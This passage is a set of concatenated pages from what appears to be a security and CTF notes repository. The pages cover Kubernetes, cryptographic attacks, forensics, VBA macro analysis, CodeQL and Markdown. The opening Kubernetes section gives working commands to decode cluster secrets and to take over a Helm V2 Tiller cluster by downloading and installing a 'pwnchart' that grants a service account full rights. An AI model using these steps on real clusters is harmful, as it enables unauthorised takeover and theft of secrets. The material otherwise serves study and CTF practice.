45 | # # Get and decode a secret
46 | $ kubectl get secret <SECRET_NAME> -o jsonpath='{.data.*}' | base64 -d
47 |
48 | 49 | ## Helm V2 - Tiller 50 | 51 | At the time of writing, [Helm](https://helm.sh/) V3 is the newest version, but many clusters still use the outdated V2. This bears some serious security considerations as the Tiller component has full cluster administration RBAC privileges, which can be exploited if we have access to `helm`. 52 | 53 | Taken from [here](https://madhuakula.com/kubernetes-goat/docs/scenarios/scenario-9/helm-v2-tiller-to-pwn-kubernetes-cluster-takeover/welcome), you can test the TCP connection on port `44134` and verify the version: 54 | 55 | 
$ nc -v tiller-deploy.kube-system 44134
56 | Connection to tiller-deploy.kube-system 44134 port [tcp/*] succeeded!
57 | $ helm version
58 | Client: &version.Version{SemVer:"v2.0.0", GitCommit:"ff52399e51bb880526e9cd0ed8386f6433b74da1", GitTreeState:"clean"}
59 | Server: &version.Version{SemVer:"v2.0.0", GitCommit:"b0c113dfb9f612a9add796549da66c0d294508a3", GitTreeState:"clean"}
60 |
61 | 62 | To start exploiting this, a ready-to-use template exists that requires some minimal changes: 63 | 64 | {% embed url="https://github.com/Ruil1n/helm-tiller-pwn" %} 65 | 66 | ```shell-session 67 | $ curl -o ./pwnchart.tgz https://github.com/Ruil1n/helm-tiller-pwn/raw/main/pwnchart-0.1.0.tgz 68 | $ tar xvf ./pwnchart.tgz 69 | ``` 70 | 71 | Inside the newly created `./pwnchart` folder there the two `clusterrole.yaml` and `clusterrolebiniding.yaml` files in the `templates/` folder require the following change: 72 | 73 | {% code title="templates/*.yaml" %} 74 | ```diff 75 | - apiVersion: rbac.authorization.k8s.io/v1beta1 76 | + apiVersion: rbac.authorization.k8s.io/v1 77 | ``` 78 | {% endcode %} 79 | 80 | As well as the `values.yml` file where the `name:` key needs to be changed to the **name of the service account token** which will gain all privileges. Make sure this is a service account you own: 81 | 82 | ```diff 83 | - name: default 84 | + name: compromised-user 85 | ``` 86 | 87 | Finally, after setting this up you can run the command to install it: 88 | 89 | ```bash 90 | helm --host tiller-deploy.kube-system:44134 install --name pwnchart ./pwnchart 91 | ``` 92 | 93 | After doing so, the `compromised-user` token will have every permission on the cluster and can access anything. Check `kubectl get all` for a list of everything. 94 | -------------------------------------------------------------------------------- /cryptography/asymmetric-encryption/README.md: -------------------------------------------------------------------------------- 1 | --- 2 | description: >- 3 | Using Public and Private keys to securely transmit data in a way that only the 4 | recipients can decrypt it 5 | --- 6 | 7 | # Asymmetric Encryption 8 | 9 | -------------------------------------------------------------------------------- /cryptography/asymmetric-encryption/diffie-hellman.md: -------------------------------------------------------------------------------- 1 | --- 2 | description: >- 3 | The Diffie-Hellman Key Exchange uses asymmetric encryption to set up a shared 4 | secret for symmetric encryption 5 | --- 6 | 7 | # Diffie-Hellman 8 | 9 | ## Description 10 | 11 | Symmetric encryption like AES requires a **Shared Secret** from both parties to be able to communicate securely across a **Public Channel** where messages can be intercepted or altered. Asymmetric on the other hand just requires both parties to have their own keypair, but it is very slow to compute in comparison to symmetric encryption. \ 12 | The **Diffie-Hellman Key Exchange** solves this problem by utilizing an asymmetric scheme to create a shared secret that can then be used for symmetric encryption. 13 | 14 |

Diffie-Hellman Key Exchage: Shared Secret is computed by Alice and Bob with a Public Channel

15 | 16 | Performing this algorithm is pretty simple. A _prime_ number `p` and _generator_ `g` are chosen (often some well-known numbers), and Alice and Bob both have their own _private key_. Using the public `g` and `p`, they both compute their _public key_, which is shared across the Public Channel. When the other receives their public key, they use their private key to compute the final secret. 17 | 18 | The order in multiplication does not matter, meaning Alice's $$g^{a*b}$$ will be the same as Bob's $$g^{b*a}$$.\ 19 | All without ever showing the private `a`, `b`, or the secret. 20 | 21 | In summary, Alice's private key + Bob's public key == Bob's private key + Alice's public key. 22 | 23 | ### Security 24 | 25 | The difficulty comes from knowing $$A = g^a \mod p$$, but being unable to compute `a` from it. It is known as the [Discrete Logarithm Problem](https://en.wikipedia.org/wiki/Discrete_logarithm) and if an efficient algorithm is ever found, it would break a lot of cryptography. 26 | 27 | $$ 28 | \begin{split} 29 | output &= base^{exponent} \mod p \\ 30 | { }\\ 31 | {exponent} &= log_{base}(output) \mod p 32 | \end{split} 33 | $$ 34 | 35 | Read this [Wikipedia section ](https://en.wikipedia.org/wiki/Diffie%E2%80%93Hellman_key_exchange#Security)about security for some more information, and a fun practical attack against the internet as we know it. 36 | 37 | ## Attacks 38 | 39 | There are many different attacks for the Diffie-Hellman key exchange, especially if you have some control over the numbers that computations happen on. I recommend looking up \ 40 | "diffie hellman ctf" in your favorite search engine to find some practical examples. 41 | 42 | An important piece here is the group order $$G$$ of the modulus `p`, which is normally `p-1`. But if this `p-1` value can be **factored into small primes**, this greatly reduces the strength and makes it vulnerable to Pohlig–Hellman algorithm (see [#g-only-has-small-factors](diffie-hellman.md#g-only-has-small-factors "mention")). If it helps, read [this answer](https://crypto.stackexchange.com/questions/87137/how-to-get-the-order-of-a-group-generator-in-dh/87138#87138) to understand how $$G$$ is calculated in Diffie-Hellman. 43 | 44 | After breaking the logic and finding a private key, you can often just calculate the shared secret yourself and use it to decrypt whatever messages were encrypted. 45 | 46 | ### Computing manually 47 | 48 | A simple approach to solving the Discrete Logarithm using a **meet-in-the-middle** algorithm. It tries to compute private key `a` from a known public key `A`, `g` and `p`. A requirement for this algorithm is that the group order $$G$$ explained above is **small**. 49 | 50 | [`sage`](https://github.com/sagemath) is a useful tool in mathematics that has many features and built-in algorithms. One of which is the [`discrete_log`](https://doc.sagemath.org/html/en/reference/groups/sage/groups/generic.html#sage.groups.generic.discrete_log) function that has several common algorithms implemented that it will choose from automatically. When dealing with Diffie-Hellman and non-standard generation of `p`, it's a good idea to try throwing it into this function to find out if it is easily breakable: 51 | 52 | ```python 53 | R = IntegerModRing(p) # Handle modular arithmetic 54 | a = discrete_log(R(A), R(g)) # Compute a (Alice) from A and g mod p 55 | b = discrete_log(R(B), R(g)) # Compute b (Bob) from B and g mod p 56 | ``` 57 | 58 | ### G only has small factors 59 | 60 | Normally, the group order $$G$$ has a large prime factor keeping it safe, but if this is not the case (eg. created from many small primes), [Pohlig–Hellman algorithm](https://en.wikipedia.org/wiki/Pohlig%E2%80%93Hellman_algorithm) can be used to efficiently perform the Discrete Logarithm. The `discrete_log()` function from sage will also try this method **automatically** if it finds the group order is composite instead of prime, so the same method as above can be used. 61 | 62 | For a simple explanation of the idea behind this attack, [read this example](https://github.com/zelinsky/CTF-Course/blob/master/Classes/16.md#example). 63 | -------------------------------------------------------------------------------- /cryptography/blockchain/README.md: -------------------------------------------------------------------------------- 1 | # Blockchain 2 | 3 | -------------------------------------------------------------------------------- /cryptography/blockchain/bitcoin-addresses.md: -------------------------------------------------------------------------------- 1 | --- 2 | description: A bit of information about Bitcoin addresses 3 | --- 4 | 5 | # Bitcoin addresses 6 | 7 | Addresses (public keys) are generated from the private key using Elliptic Curve Cryptography and are often displayed in Base58 (Base64 with a few confusing characters removed like `0OIl`). 8 | 9 | You can simulate this behavior if you have a private key for example, but no public key. In this case, simply pass the private key through the normal generating function, here is an example in Python ([source](https://bitcoin.stackexchange.com/a/96191)): 10 | 11 | ```python 12 | import ecdsa 13 | import hashlib 14 | import base58 15 | 16 | private_key = "5JYJWrRd7sbqEzL9KR9dYTGrxyLqZEhPtnCtcvhC5t8ZvWgS9iC" 17 | 18 | # WIF to private key by https://en.bitcoin.it/wiki/Wallet_import_format 19 | private_key_bytes = base58.b58decode_check(private_key)[1:] 20 | 21 | # Private key to public key (ecdsa transformation) 22 | signing_key = ecdsa.SigningKey.from_string(private_key_bytes, curve=ecdsa.SECP256k1) 23 | verifying_key = signing_key.get_verifying_key() 24 | public_key = b"\x04" + verifying_key.to_string() 25 | 26 | # hash sha 256 of pubkey 27 | sha256_1 = hashlib.sha256(public_key) 28 | 29 | # hash ripemd of sha of pubkey 30 | ripemd160 = hashlib.new("ripemd160") 31 | ripemd160.update(sha256_1.digest()) 32 | 33 | # checksum 34 | hashed_public_key = b"\x00" + ripemd160.digest() 35 | checksum_full = hashlib.sha256(hashlib.sha256(hashed_public_key).digest()).digest() 36 | checksum = checksum_full[:4] 37 | bin_addr = hashed_public_key + checksum 38 | 39 | # encode address to base58 and print 40 | address = base58.b58encode(bin_addr) 41 | print(f"{address=}") # b'1AsSgrcaWWTdmJBufJiGWB87dmwUf2PLMZ' 42 | ``` 43 | 44 | {% hint style="info" %} 45 | You may have a hex-encoded version of the key. In this case, simply decode the key from hex instead of Base58, and you should have the `private_key_bytes` again 46 | {% endhint %} 47 | -------------------------------------------------------------------------------- /cryptography/custom-ciphers/README.md: -------------------------------------------------------------------------------- 1 | --- 2 | description: >- 3 | "Never roll your own crypto" is a saying for a reason. It's hard to make a 4 | secure cryptographic algorithm because there are many ways it may be broken 5 | --- 6 | 7 | # Custom Ciphers 8 | 9 | ## General Ideas 10 | 11 | The first thing you should look at with a custom cipher is what randomness it relies on. You should look at **how many possible keys** there are to brute-force. Sometimes only ASCII values are allowed in the key, meaning you don't have to brute-force all 256 bytes, but only the 32-127 bytes. 12 | 13 | Also think about if it's possible to brute-force some parts **separately**, instead of all at once. Sometimes you can know when a certain byte in the key is correct, meaning you can brute-force all the bytes one by one. 14 | 15 | This is the basis of finding vulnerabilities in custom ciphers. It's all about thinking about how you could brute-force the key and tricks to do it more efficiently. 16 | 17 | In a challenge meant to be solved, it is often fast enough to use a simple language like Python. But it creates lots of overhead and implementations of brute-force in languages like C or Rust will often be way faster. 18 | 19 | ### Meet in the Middle 20 | 21 | There is a great [YouTube video](https://www.youtube.com/watch?v=wL3uWO-KLUE) by _polylog_ explaining this technique to solve Rubik's Cubes as an example. 22 | 23 |

An visual example of using the Meet in the Middle attack for Rubik's Cubes (from the video)

24 | 25 | The goal of a cryptographic algorithm is that it's really hard to brute-force. Sometimes this is done by repeating tasks to make it exponentially harder. 26 | 27 | Take **DES,** for example, an old encryption standard with a **56-bit** key. Nowadays cracking a 56-bit key is doable on a very powerful computer. We could naively just come up with "**Double DES**", which would just be 2 DES encryptions with 2 different keys. That means you would need 2x56-bit keys meaning 112 bits. This is absolutely not brute-forcible and you might think it is secure. 28 | 29 | When you only have a ciphertext and you don't know what plaintext it will turn into, you cannot break it as you would indeed need to brute-force all 112 bits at the same time, maybe until some meaningful text comes out. You would need about 5e+33 operations to go through all the keys. 30 | 31 | But in the case, you have a **plaintext-ciphertext pair**, you can do a lot better. This is because you don't need to start at the ciphertext and brute-force all the way to the plaintext. Instead, you can start brute-force _decrypting_ from the ciphertext **halfway** to the plaintext, and then also brute-force _encrypting_ from the plaintext halfway to the ciphertext. If you store all the middle values from encrypting the plaintext, you can try to find a match when decrypting the ciphertext. A match here means the first 56-bit key is the one from the plaintext, and the second key is the one from the ciphertext. This is known as the **Meet in the Middle** attack. 32 | 33 | You could use this to cut the exponent in half of something that exponentially gets harder. In this Double DES example above, it would result in brute-forcing two 56-bit keys separately, instead of one 112-bit key. The only catch here is the fact that you would have to store all the halfway points and their keys, meaning it could take up quite a bit of **memory**. But this is often very worth it as the amount of computation is greatly reduced. 34 | 35 | {% hint style="info" %} 36 | **Note**: Often you'll see in real challenges that the key has some restrictions which make it not as random as completely random bits to brute-force. Since these attacks rely on half of the exponent being doable, which isn't always the case with large-key cryptographic algorithms like AES. 37 | {% endhint %} 38 | 39 | For an example of this attack in practice, you can see this writeup: 40 | 41 | {% embed url="https://jorianwoltjer.com/blog/post/ctf/cyber-santa-is-coming-to-town-2021/meet-me-halfway" %} 42 | Challenge with two weak AES keys to brute-force separately using Meet in the Middle 43 | {% endembed %} 44 | 45 | The basic idea of the attack is first brute-forcing one key, then saving all the halfway point together with the key they came from, then brute-forcing the second key and checking when a halfway point matches that from the first key. Then you have both parts of the key. 46 | -------------------------------------------------------------------------------- /cryptography/xor.md: -------------------------------------------------------------------------------- 1 | --- 2 | description: An operation between bits used often in cryptography 3 | --- 4 | 5 | # XOR 6 | 7 | ## Description 8 | 9 | Understanding XOR is very important in cryptography because a lot of encryption algorithms use it in some way. XOR stands for eXclusive OR, meaning it's the OR operation but without 1+1 being true. You can see a truth table below: 10 | 11 |
XOR01
001
110
12 | 13 | This means that only if the two values are different, the XOR function will return 1. It also means that if one value is 1, the result will be the inverse of the other value. So XORing with 1 is basically flipping a bit. 14 | 15 | Often you're working with long strings of bytes that are XORed, but this works the same way, just doing XOR for every bit: 16 | 17 | ```python 18 | 01000010 01111001 01100101 = "Hey" # Plaintext 19 | 01001011 01000101 01011001 = "KEY" # Key 20 | -------------------------- XOR 21 | 00001001 00111100 00111100 = "\t<<" # Ciphertext 22 | ``` 23 | 24 | The nice thing about XOR is also the fact that encryption and decryption are the exact same operation because you're just flipping the bits where the key is 1. When decrypting you're just flipping the bits back: 25 | 26 | ```python 27 | 00001001 00111100 00111100 = "\t<<" # Ciphertext 28 | 01001011 01000101 01011001 = "KEY" # Key 29 | -------------------------- XOR 30 | 01000010 01111001 01100101 = "Hey" # Plaintext 31 | ``` 32 | 33 | But this also means that if you know the ciphertext, and the plaintext you can XOR them both to get the key: 34 | 35 | ```python 36 | 00001001 00111100 00111100 = "\t<<" # Ciphertext 37 | 01000010 01111001 01100101 = "Hey" # Plaintext 38 | -------------------------- XOR 39 | 01001011 01000101 01011001 = "KEY" # Key 40 | ``` 41 | 42 | Since XOR encryption works bit-by-bit you don't even need to know the whole plaintext to get part of the key. If you know only the first few characters of the plaintext, or in some special positions you can still get the key at those same positions. 43 | 44 | ## Repeating-key XOR 45 | 46 | Repeating-key XOR is when a key for XOR is shorter than the plaintext/ciphertext and needs to be repeated to fill the space. 47 | 48 | ``` 49 | Plaintext: Hello, world! And some more text. 50 | Key: secretsecretsecretsecretsecretsec 51 | ``` 52 | 53 | Using some analytical techniques it's possible to abuse this fact to brute-force the key byte-by-byte by looking at what the plaintext would be after decrypting. You can filter out any non-printable characters for example to narrow down a lot of results, and there are lots of techniques fo finding how normal a text looks. As you can imagine this works better for longer plaintexts, because the key will be repeated more times. 54 | 55 | There is a useful tool that finds the key length, and brute-forces it automatically: 56 | 57 | {% embed url="https://github.com/hellman/xortool" %} 58 | A tool to analyze and brute-force XOR repeating-key encryption 59 | {% endembed %} 60 | 61 | {% code title="Examples" %} 62 | ```shell 63 | xortool file.bin # Find lengths 64 | xortool -l 11 -c 20 file.bin # Length 11 + character \x20 (space) most common 65 | xortool -x -c ' ' file.hex # File is hex encoded + space character most common 66 | xortool -b -f message.enc # Brute-force with output filter (charset) 67 | xortool -b -p "CTF{" message.enc # Brute-force with known plaintext 68 | ``` 69 | {% endcode %} 70 | 71 | ## Multi-Time Pad (Crib Dragging) 72 | 73 | The [One-Time Pad](https://en.wikipedia.org/wiki/One-time\_pad) (OTP) is a well-known **unbreakable** cipher. The important thing though is _One-Time_, and when the key is used multiple times instead, it becomes insecure very quickly. 74 | 75 | [This answer](https://crypto.stackexchange.com/a/33694) explains the idea behind the "Many-Time Pad" attack. The main takeaway is that if you guess one character at a position correctly, you can get back the secret at that index, and reuse that for other ciphertexts to make better guesses. 76 | 77 | A simple but useful tool here is the one linked below. You provide two ciphertexts and can guess common strings like " `the` " or "`. The` " or others if you know part of the plaintext. The tool will show what the other plaintext must be at all positions. Try to find a plausible text here, and click Output 1/2 to save it there and continue: 78 | 79 | {% embed url="https://toolbox.lotusfa.com/crib_drag/" %} 80 | Try "Crib words" to guess plaintext possibilities and find positions 81 | {% endembed %} 82 | 83 | After finding a chunk of plaintext, a useful **interactive tool** is [MTP](https://github.com/CameronLonsdale/MTP) by _CameronLonsdale_. It allows you to write letters in all plaintext guesses at the same time to see if anything makes sense: 84 | 85 |

Interactively guess letters to expand the plaintext all the way

86 | -------------------------------------------------------------------------------- /forensics/file-recovery.md: -------------------------------------------------------------------------------- 1 | --- 2 | description: Recovering content of deleted files 3 | --- 4 | 5 | # File Recovery 6 | 7 | Find disks using `mount` and looking for `sd[a-z]`: 8 | 9 | 
$ mount
10 | /dev/sdb on / type ext4 (rw,relatime,discard,errors=remount-ro,data=ordered)
11 | ...
12 |
13 | 14 | Then grep for any known text: 15 | 16 | ```shell-session 17 | $ sudo grep -a -C 200 -F 'Insert text here' /dev/sdb | tee /tmp/recovered 18 | ``` 19 | 20 | This will output a lot of garbage as well, so you can then filter on ASCII lines only: 21 | 22 | ```shell-session 23 | $ grep --color=never -aoP '^[[:ascii:]]*$' /tmp/recovered 24 | ``` 25 | -------------------------------------------------------------------------------- /forensics/grep.md: -------------------------------------------------------------------------------- 1 | --- 2 | description: Search for text inside of files 3 | --- 4 | 5 | # Grep 6 | 7 | ## Description 8 | 9 | Grep is a really useful tool for quickly finding what you're looking for. If you know a file somewhere has some content, or just want to find all files with a certain pattern in them, Grep is the perfect tool for the job. It's written in C and highly optimized, meaning you can quickly search through lots of files. 10 | 11 | ```shell-session 12 | $ grep [OPTIONS...] PATTERNS [FILES...] 13 | ``` 14 | 15 | * `OPTIONS` can be any flags to change the way the search works, or matches are displayed 16 | * `PATTERNS` are a string containing one or more patterns to search for, separated by newline characters (`\n`). To put a newline character in an argument you can use the `$'first\nsecond'` syntax 17 | * `FILES` are the files to search through for the `PATTERNS`. If not specified, it will read from standard input (piping into grep). If in recursive mode with -r, it will default to the current directory but can be any directory 18 | 19 | 
$ grep something file.txt
20 | And here is something.
21 |
22 | 23 | {% hint style="info" %} 24 | See all documentation about the options with `man grep` 25 | {% endhint %} 26 | 27 | ### Options 28 | 29 | The are a few common and really useful options to know in Grep: 30 | 31 | * `-r`: **R**ecursively search a directory (default: current) 32 | * `-v`: In**v**ert search, matching lines where no match 33 | * `-i`: Search case-**i**nsensitive (uppercase/lowercase doesn't matter) 34 | * `-n`: Print the line **n**umber of the match in the file 35 | * `-o`: **O**nly output match (no text around) 36 | * `-a`: Show **a**ll matches (also binary files) 37 | * `-b`: Show **b**yte-offset of matches 38 | * `-l`: **L**ist files that match instead of showing the match 39 | * Simple [regular-expressions-regex.md](../languages/regular-expressions-regex.md "mention") are enabled by default in `PATTERNS` 40 | * `-F`: Treat `PATTERNS` as **f**ixed strings, not regular expressions 41 | * `-P`: Use **p**erl-compatible regular expressions (PCRE) including all advanced RegEx features 42 | 43 | Some options are also available by using `egrep` (`-E`), `fgrep` (`-F`) and `rgrep` (`-r`) to quickly set the options without having to add the flag. 44 | 45 | {% code title="Examples" %} 46 | ```shell-session 47 | # # Select files and output 48 | $ grep -r "something" # Search recursively in current directory for "something" 49 | $ grep -v "something" file.txt # Find all lines in file that don't match "something" 50 | $ grep "something" *.txt # Search "something" in all .txt files (current directory only) 51 | $ grep -r "something" --include "*.txt" # Recursivly search "something" in .txt files 52 | $ grep -ab "something" file.bin # Show all (binary) matches and byte-offset 53 | $ grep -r -l "something" # List filenames that match "something" recursively 54 | $ grep -B2 -A5 "something" file.txt # Show 2 lines before, and 5 lines after match 55 | 56 | # # Patterns 57 | $ grep -r -i "something" # Search case-insensitively for "something" 58 | $ grep "CTF{.*}" file.txt # Search for flag format in file 59 | $ grep -P "\x73\x6f\x6d\x65\x74\x68\x69\x6e\x67" file.txt # Search for hex bytes in file 60 | $ xxd -p file.txt | grep "aabbccdd" # Search for hex bytes using xxd 61 | $ grep $'first\nsecond' file.txt # Search for multiple patterns in one file 62 | ``` 63 | {% endcode %} 64 | 65 | {% hint style="info" %} 66 | **Tip**: Also check out [`ripgrep`](https://github.com/BurntSushi/ripgrep) for a Rust implementation of most `grep` features, with better defaults for recursive searching while skipping unnecessary files 67 | {% endhint %} 68 | -------------------------------------------------------------------------------- /forensics/vba-macros.md: -------------------------------------------------------------------------------- 1 | --- 2 | description: >- 3 | Visual Basic for Applications is a programming language used to create macro 4 | scripts for Microsoft office apps 5 | --- 6 | 7 | # VBA Macros 8 | 9 | VBA Macros are often used for malware as they provide an easy way to execute code by only opening a seemingly harmless Word/Excel document. Not all documents are macro-enabled, only the following are ([source](https://en.wikipedia.org/wiki/List\_of\_Microsoft\_Office\_filename\_extensions)): 10 | 11 | * `.docm`: Word macro-enabled document 12 | * `.dotm`: Word macro-enabled template 13 | * `.xlm`: Legacy Excel macro 14 | * `.xlsm`: Excel macro-enabled workbook 15 | * `.xltm`: Excel macro-enabled template 16 | * `.xla`: Excel add-in that can contain macros 17 | * `.xlam`: Excel macro-enabled add-in 18 | * `.ppam`: PowerPoint 2007 add-in with macros enabled 19 | * `.pptm`: PowerPoint macro-enabled presentation 20 | * `.potm`: PowerPoint macro-enabled template 21 | * `.ppsm`: PowerPoint macro-enabled slideshow 22 | * `.sldm`: PowerPoint macro-enabled slide 23 | 24 | ## OleVBA 25 | 26 | [OleVBA](https://github.com/decalage2/oletools/wiki/olevba) is a tool to detect and analyze VBA Macros. It can find suspicious pieces of code and decode strings to allow you to reverse engineer what the code is doing. 27 | 28 | You can get the source code of a macro-enabled document using the following command: 29 | 30 | ```shell-session 31 | $ olevba document.docm 32 | ``` 33 | 34 | This will output a few different things. It will show the VBA code of all the macro files inside, and an analysis of suspicious strings and things like `AutoExec` that can activate macros when you open the document. This source code is what you'll most likely want to be looking at, but often it is very obfuscated as malware detection is getting better and better. 35 | 36 | ### Deobfuscating 37 | 38 | The `--reveal` option can decode a few encodings to make the code more readable in some cases: 39 | 40 | ```shell-session 41 | $ olevba invitation.docm --reveal > reveal.txt # Decode using olevba 42 | $ sed -i -E "s/b'([^'\\\\]*(\\\\.[^'\\\\]*)*)'/\1/g" reveal.txt # Replace b'' strings in output 43 | ``` 44 | 45 | For the rest, it's mostly a process of putting the code in a file, and analyzing it by hand with a nice code editor 46 | 47 | {% hint style="info" %} 48 | **Tip:** Use the [XVBA VSCode extension](https://marketplace.visualstudio.com/items?itemName=local-smart.excel-live-server) to easily navigate and highlight the code 49 | {% endhint %} 50 | 51 | A few pieces of syntax you'll likely come across are the following: 52 | 53 | * `Sub main() ... End Sub`: This is a Subroutine, basically a function that is meant to be run by the user. Often these kinds of functions are what trigger the rest, so this is a good place to start 54 | * `Function do_something(arg1 As String) As String ... End Function`: Obviously, this is a function, but it's also important to notice the `As String` types. This shows the types of the argument and the function return type. A value is returned from a function by setting a variable in the function to the name of the function, so this function could **return** using `do_something = ...` in the function body. 55 | * `Dim some_var As String`: Define a variable with a type 56 | 57 | ### Dynamic analysis 58 | 59 | It might be quite some work to manually evaluate the code in your head while reading it, so another option is to just run some smaller pieces of code while logging various outputs. This can save a lot of time, when some larger malicious code is built from string operations for example. It would be really easy to just run the code that builds the malicious code and then analyze that further. 60 | 61 | You can make a simple macro to run by opening a blank document in **Word**, going to the **Developer** tab (if you don't see this [try enabling it here](https://support.microsoft.com/en-us/office/show-the-developer-tab-in-word-e356706f-1891-4bb8-8d72-f57a51146792)), and choosing **Visual Basic**. From there you can **Insert** -> **Module** and a window should pop up for you to write code in. You should start with a `Sub` where you can write your code, and when you want to try running the code press the green ![](<../.gitbook/assets/image (13) (1).png>) button or just press F5. 62 | 63 | Here's a simple example that should pop up some text: 64 | 65 | ```vba 66 | Sub main() 67 | MsgBox "Hello, world!" 68 | End Sub 69 | ``` 70 | 71 | Often you'll want to use this to see the return values of functions, so one simple way is to just call a function, and save the result to a file, as VBA does not have a simple console to log things in. The code would look something like this: 72 | 73 | ```vba 74 | Sub main() 75 | Dim result As String 76 | result = mystery() 77 | Open "result.txt" For Output As #1 78 | Print #1, result 79 | Close #1 80 | End Sub 81 | 82 | Function mystery() As String 83 | mystery = "this is returned" 84 | End Function 85 | ``` 86 | 87 | When saving a file like this, you need to have saved the document you're working on somewhere. Then all paths in the macros will be relative to that saved file, so you should find `result.txt` next to the saved document. 88 | 89 | When saving the file you need to explicitly say it is a document with macros enabled, or else it won't save the macros with the document. Do this simply by selecting **Word Macro-Enabled Document (\*.docm)** in **Save as type**. 90 | 91 | Afterward, you should be able to quickly run your macro with F5 and check the output in `result.txt`. 92 | -------------------------------------------------------------------------------- /languages/assembly.md: -------------------------------------------------------------------------------- 1 | --- 2 | description: A few cheatsheet-like things about the Assembly language 3 | --- 4 | 5 | # Assembly 6 | 7 | ## Registers 8 | 9 | Generally, `r`-prefixed registers are 64-bit, `e`-prefixed registers are 32-bit, non-prefixed registers are 16-bit, and `l`-suffixed registers are 8-bit. For `r8-15` see the special cases below ([source](https://stackoverflow.com/a/20637866/10508498)): 10 | 11 |
64-bit registerLower 32 bitsLower 16 bitsLower 8 bits
raxeaxaxal
rbxebxbxbl
rcxecxcxcl
rdxedxdxdl
rsiesisisil
rdiedididil
rbpebpbpbpl
rspespspspl
r8r8dr8wr8b (r8l)
r9r9dr9wr9b (r9l)
r10r10dr10wr10b (r10l)
r11r11dr11wr11b (r11l)
r12r12dr12wr12b (r12l)
r13r13dr13wr13b (r13l)
r14r14dr14wr14b (r14l)
r15r15dr15wr15b (r15l)
12 | 13 | See [shellcode.md](../binary-exploitation/shellcode.md "mention") for writing malicious Assembly code and some examples of compiling 14 | -------------------------------------------------------------------------------- /languages/codeql.md: -------------------------------------------------------------------------------- 1 | --- 2 | description: A query language for repositories of code 3 | --- 4 | 5 | # CodeQL 6 | 7 | ## Setup 8 | 9 | Follow the Getting Started documentation to install the precompiled binary: 10 | 11 | {% embed url="https://docs.github.com/en/code-security/codeql-cli/using-the-codeql-cli/getting-started-with-the-codeql-cli" %} 12 | Getting Started with installing the CodeQL CLI and some other useful tools 13 | {% endembed %} 14 | 15 | On the releases page, you should download the "CodeQL Bundle" from any of the assets, likely [`codeql-bundle-linux64.tar.gz`](https://github.com/github/codeql-action/releases/latest/download/codeql-bundle-linux64.tar.gz). 16 | 17 | In case you need more queries for different languages not already included in the bundle, try downloading a [precompiled pack of queries](https://docs.github.com/en/code-security/codeql-cli/getting-started-with-the-codeql-cli/setting-up-the-codeql-cli#testing-the-codeql-cli-configuration) per language: 18 | 19 | {% code title="Example" %} 20 | ```bash 21 | codeql pack download codeql/python-queries 22 | ``` 23 | {% endcode %} 24 | 25 | ## Creating a database 26 | 27 | {% embed url="https://docs.github.com/en/code-security/codeql-cli/using-the-codeql-cli/creating-codeql-databases" %} 28 | Create a CodeQL database from a repository to analyze later with queries 29 | {% endembed %} 30 | 31 | Create a database with the following command, inside the root folder of the project you are trying to analyze. `` will be the output directory, and `` is one of the supported languages that the project is written in. 32 | 33 | ```bash 34 | codeql database create --language= 35 | ``` 36 | 37 | {% code title="Example" %} 38 | ```bash 39 | codeql database create .codeql --language=python 40 | ``` 41 | {% endcode %} 42 | 43 | {% hint style="info" %} 44 | **Tip**: For some compiled languages like `java`, the autobuilder may not be able to build your source code to index it. You can choose for `--build-mode=none` to disable building the project and just look at the source files. 45 | {% endhint %} 46 | 47 | ## Analyzing a database 48 | 49 | {% embed url="https://docs.github.com/en/code-security/codeql-cli/using-the-codeql-cli/analyzing-databases-with-the-codeql-cli" %} 50 | Use queries to analyze a CodeQL database 51 | {% endembed %} 52 | 53 | When you have created a database, use the `analyze` command to run queries on a database. `` can be one of the possible multiple formats, like `csv` or `sarif-latest`. 54 | 55 | ```bash 56 | codeql database analyze --format= --output 57 | ``` 58 | 59 | {% code title="Example" %} 60 | ```bash 61 | codeql database analyze .codeql --format=sarif-latest --output codeql.sarif 62 | ``` 63 | {% endcode %} 64 | 65 | You can view a CSV file with any spreadsheet program, but the most useful format is [`.sarif`](https://docs.github.com/en/code-security/codeql-cli/codeql-cli-reference/sarif-output). To view the findings and locations in the code you can use the [Sarif Viewer VSCode extension](https://github.com/microsoft/sarif-vscode-extension). 66 | 67 | {% embed url="https://marketplace.visualstudio.com/items?itemName=MS-SarifVSCode.sarif-viewer" %} 68 | Download **SARIF Viewer** extension by Microsoft DevLabs 69 | {% endembed %} 70 | -------------------------------------------------------------------------------- /languages/markdown.md: -------------------------------------------------------------------------------- 1 | --- 2 | description: >- 3 | Markdown is an easy to use markup language used in the Github README for 4 | example 5 | --- 6 | 7 | # Markdown 8 | 9 | ## Syntax 10 | 11 | Markdown is a standard for text markup. It allows you to make text **bold**, _italic_, and in all kinds of different styles. It uses special characters around certain text to apply markup to it. Often markdown is used in text editors like on GitHub `README.md` files or Discord messages. Then the files are converted to another language like HTML with CSS or PDF to actually show the Here are the rules: 12 | 13 | {% embed url="https://www.markdownguide.org/cheat-sheet/" %} 14 | A cheatsheet explaining all of the Markdown syntax 15 | {% endembed %} 16 | 17 | | Element | Markdown Syntax | 18 | | ------------------------------------------------------------------- | -------------------------------------------------------------------------------------------------- | 19 | |

Heading

|

# H1
## H2
### H3

| 20 | | **Bold** | `**bold text**` | 21 | | _Italic_ | `*italicized text*` | 22 | | ![](<../.gitbook/assets/image (8) (1).png>) | `> blockquote` | 23 | |
  1. First item
  2. Second item
  3. Third item
|

1. First item
2. Second item
3. Third item

| 24 | |
  • First item
  • Second item
  • Third item
|

- First item
- Second item
- Third item

| 25 | | `code` | `` `code` `` | 26 | | ![](<../.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1).png>) | `---` | 27 | | [Link](https://www.example.com) | `[title](https://www.example.com)` | 28 | | ![](<../.gitbook/assets/image (11) (1).png>) | `![alt text](image.jpg)` | 29 | 30 | ### Advanced Syntax 31 | 32 | |

SyntaxDescription
HeaderTitle
ParagraphText
|

| Syntax | Description |
| ----------- | ----------- |
| Header | Title |
| Paragraph | Text |

| 33 | | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ | --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | 34 | | 

{
35 |   "firstName": "John",
36 |   "lastName": "Smith",
37 |   "age": 25
38 | }
39 |
|

```json
{
"firstName": "John",
"lastName": "Smith",
"age": 25
}
```

| 40 | | ~~Strikethrough~~ | `~~strikethrough~~` | 41 | |

  • Checklist
  • Item 2
  • Item 3
|

- [x] Write the press release
- [ ] Update the website
- [ ] Contact the media

